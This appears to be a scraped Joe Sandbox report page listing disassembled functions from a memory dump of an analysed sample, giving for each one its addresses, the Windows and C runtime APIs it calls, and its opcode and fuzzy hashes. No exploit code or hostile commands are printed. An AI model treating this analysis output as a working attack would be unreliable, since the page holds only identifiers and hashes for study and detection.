Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
Instruction ID: 7a95f018ab83f649e9363d7524e5ba248d8265a9cd49b7ecc592ef8c7e3e4cb8
Opcode Fuzzy Hash: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
Instruction Fuzzy Hash: D2316B73618A918AEB609F64E8403ED3364FB84784F44443ADA4E87B98DF3AD648C719

Function 00007FF6E60BABD8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6E60BAC51
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6E60BAC69
RtlVirtualUnwind.KERNEL32 ref: 00007FF6E60BACA4
IsDebuggerPresent.KERNEL32 ref: 00007FF6E60BACDD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6E60BACE7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6E60BACF2

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
Instruction ID: 4bc0dde511f432e51653bca4d7d4d00763641d2a2e4b0f240c473b6a9e301c1e
Opcode Fuzzy Hash: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
Instruction Fuzzy Hash: 92318233618B9186DB60CF24E8443AD33A4FB84794F504135EE8E87B98DF3AC545CB05

Function 00007FF6E60C1EE4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C1F30
FindFirstFileExW.KERNEL32 ref: 00007FF6E60C203A

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
Instruction ID: ffbda31d2fd452d4feb6dad7796dd15e231a75ad7abaa140bba8a8cd777e73ed
Opcode Fuzzy Hash: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
Instruction Fuzzy Hash: 80B1E423B386A241EA60DB659A143B96350EB94BD0F544132EE5F8BBC9DF3FE441C316

Function 00007FF6E60AC460 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6E60AC48C
GetCurrentThreadId.KERNEL32 ref: 00007FF6E60AC49A
GetCurrentProcessId.KERNEL32 ref: 00007FF6E60AC4A6
QueryPerformanceCounter.KERNEL32 ref: 00007FF6E60AC4B6

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
Instruction ID: 6ab0cc6df2e7b6d783afd6115cf9a41e3415b71eb3627a5ec1809d9b5c89ec8d
Opcode Fuzzy Hash: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
Instruction Fuzzy Hash: AF115A32B24F158AEB00CF60E8543B933A4FB18758F040E31DA6D8A7A4DF7AD5988390

Function 00007FF6E60C4280 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF6E60C42E6
memcpy_s.LIBCPMT ref: 00007FF6E60C4311

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: 08884c87120e14606576054321267f5fda441523bd1372ca02abf07c2716773d
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: E2C11473B2969687EB24CF19A24476AB7A1F794B94F408134DB4B8B744DF3EE801CB04

Function 00007FF6E60C9FF8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF6E60CA247
RaiseException.KERNEL32 ref: 00007FF6E60CA258

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: b4cdb5d9b405a5f2b155a4653528c407a9956d0b6218a393af626003cf1b5a24
Instruction ID: e433d42aba55f562797b55a51639dd593dd844587d0c84e7fe26603755ced020
Opcode Fuzzy Hash: b4cdb5d9b405a5f2b155a4653528c407a9956d0b6218a393af626003cf1b5a24
Instruction Fuzzy Hash: 17B15973A14B988BEB15CF2EC9463683BA0F784B48F148921DA5E877A4CF3BD851C715

Function 00007FF6E60A88D0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF6E60A8901
FindClose.KERNEL32 ref: 00007FF6E60A8910

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 61dd1ed1e1c953fe7bf24916078f2f4a3db137be7e9bcdd6edf362509e7e8552
Instruction ID: eb641fa7be58b5e404deec7d060075abbe3933d4c99ca3578600ed66f29454f1
Opcode Fuzzy Hash: 61dd1ed1e1c953fe7bf24916078f2f4a3db137be7e9bcdd6edf362509e7e8552
Instruction Fuzzy Hash: ACF08133A2869586E760CF64A5487AA7390EB447A4F440335DA6D466D4DF3ED0488A05

Function 00007FF6E60B3AE4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6E60B3C52
, xrefs: 00007FF6E60B3E94

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 631a3e48eb673e1850d57232dc56befdf755ff5fd67b38a64b6ca9c49a913018
Instruction ID: a51ed8cb70bed5a03b94e7bff74aea54382aeb826737695e39f7a15c2f2fb315
Opcode Fuzzy Hash: 631a3e48eb673e1850d57232dc56befdf755ff5fd67b38a64b6ca9c49a913018
Instruction Fuzzy Hash: 69E1C53392866689EB6C8A15925033D33A0FF65B44F349635DA0E8779CDF3BE851C70A

Function 00007FF6E60BE4B0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FF6E60BE63A
e+000, xrefs: 00007FF6E60BE5BD

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: 95f5c728ca916dfdd01defb08dd518f9d9b28e517fc4b7b4370436378f7798ef
Instruction ID: 3de7fe7ef446a2cf408a7134d37ab648ef0272b301efc35f41ec177436d88561
Opcode Fuzzy Hash: 95f5c728ca916dfdd01defb08dd518f9d9b28e517fc4b7b4370436378f7798ef
Instruction Fuzzy Hash: CA516A63B282E546E7248E399A047697B91E754BD4F48C231CBBC87AC9DF3FD444870A

Function 00007FF6E60BE01C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF6E60BE35E

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
Instruction ID: cdfe3505ee8e7df51bc5828b117dc915f67504e4f05a6571f1049fae3d2b9ffc
Opcode Fuzzy Hash: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
Instruction Fuzzy Hash: C5A14673A2879686EB21CB29A5007AD7B91EB50BC4F04C131DE9D87799DE3FE901C702

Function 00007FF6E60B86D0 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF6E60B86EF

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 1b049144dcca8645f5c57e32502a370ecc3fd9b97e3bd8d1628292285c2b822f
Instruction ID: 52426b7403d3aebcbd9f642509ce4879437c8c10a3aebf6d8896b4ca65dcbe39
Opcode Fuzzy Hash: 1b049144dcca8645f5c57e32502a370ecc3fd9b97e3bd8d1628292285c2b822f
Instruction Fuzzy Hash: D051A617F2866341FA64EA265B1537A5391AF44BE4F088135DE0EC77E9EE7FE402420A

Function 00007FF6E60C3AF0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6E60C3AF4

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 2a498131316ba0cf2da72d1126b97be92acaa4b08e35d008cc1bd8d186f782f7
Instruction ID: 3266a57b0949b6c87c0e7a33eb23f8f0d237af137d659df439c44a1008044072
Opcode Fuzzy Hash: 2a498131316ba0cf2da72d1126b97be92acaa4b08e35d008cc1bd8d186f782f7
Instruction Fuzzy Hash: D7B09221E2BA66C6EB482B556D8A31422A87F58B00FA440B8C50D81320DE2F20F54716

Function 00007FF6E60B36E0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208e6a978d65b3df04c2d2163cfe11b9ca3e791e60348233d6b397c6ac133608
Instruction ID: 9593d391256c5a169b588a49f4265decd5d517b87ba5820a319d12e08e2c9277
Opcode Fuzzy Hash: 208e6a978d65b3df04c2d2163cfe11b9ca3e791e60348233d6b397c6ac133608
Instruction Fuzzy Hash: 98D1EA6392866289EB6C8A25865033D27A0EF25B48F349235CE0DC779CDF7FD845C74A

Function 00007FF6E60A8FD0 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 926518188b614a96dab23eca74cd6fab0ac352dd7b9dabb22d14e7e66e5c8c54
Instruction ID: 693d7fbec5789d9bd161f5b9a8c63e746e07f21beeee24cc5952cf088d02853d
Opcode Fuzzy Hash: 926518188b614a96dab23eca74cd6fab0ac352dd7b9dabb22d14e7e66e5c8c54
Instruction Fuzzy Hash: 56C124332242F48BD698EB29E4594BA33E1F7A9349BD5403BEB874B781CA3DE404D751

Function 00007FF6E60B2D50 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67fe5c4df14f10fbabbc179396d5558260dc0a4d214c0f6109c6307dd6f74d9
Instruction ID: b440b4effca4cff3aaf9508fbb0f6c6e8cde953b56ff4ec3b2dc435b5eacb4d1
Opcode Fuzzy Hash: b67fe5c4df14f10fbabbc179396d5558260dc0a4d214c0f6109c6307dd6f74d9
Instruction Fuzzy Hash: 79B18D7392866689E7698F39C15433D3BA0EB59F48F248135CA4E87399DF3BD441C70A

Function 00007FF6E60BEB30 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41de09fd609196546d8b05baa0994189bc53ea50dddfb86cdccda31fca7eba1c
Instruction ID: 3e9b53e56ff445fb357312c32f70dd68fcca366dde59fb74c517251ccb57b1d6
Opcode Fuzzy Hash: 41de09fd609196546d8b05baa0994189bc53ea50dddfb86cdccda31fca7eba1c
Instruction Fuzzy Hash: 38811773A2879146E774CF19A68037A6A91FB857D0F148235DAAE87B8DDF3FD4008B05

Function 00007FF6E60C6D70 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f79d7b8a4b9136362ee4687d07e980b4a2c8ab22ab714f4d6b7b90f4866350ce
Instruction ID: 29916f23d60a61a5ca0bb51d360f348d3d13b8a88417dba65a7a081de2739f86
Opcode Fuzzy Hash: f79d7b8a4b9136362ee4687d07e980b4a2c8ab22ab714f4d6b7b90f4866350ce
Instruction Fuzzy Hash: E161D923E3C2B246F7748A28C6503796691AF40760F14463AE61FCB7D5EE7FE801871A

Function 00007FF6E60B1E94 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
Instruction ID: 7294969d1b968e7a66ec8f0e836c0339e49994382810dc90723430ada4704790
Opcode Fuzzy Hash: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
Instruction Fuzzy Hash: 91518337A38662C6E7248B29C15433933A0EB58B58F248131DE4D977A9DF3BE853C785

Function 00007FF6E60B1A84 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
Instruction ID: 5ada505f1f52097c7b0d6b13e8119cd443cf2f9618e28a3af5e808466a5efc3b
Opcode Fuzzy Hash: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
Instruction Fuzzy Hash: 61519177A28A6182E7248F29C14873933A0EB49F68F248171CE4D977D8DF3BE852C745

Function 00007FF6E60B22A4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
Instruction ID: 29735704f70c48714956ab998c89230a75daeebaed57d01f4222bb2ec496b3ca
Opcode Fuzzy Hash: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
Instruction Fuzzy Hash: 4A518037A2866186E7248B29D14033D37A0EB59F68F249131CE8D977A8CF3BE843C745

Function 00007FF6E60B1880 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

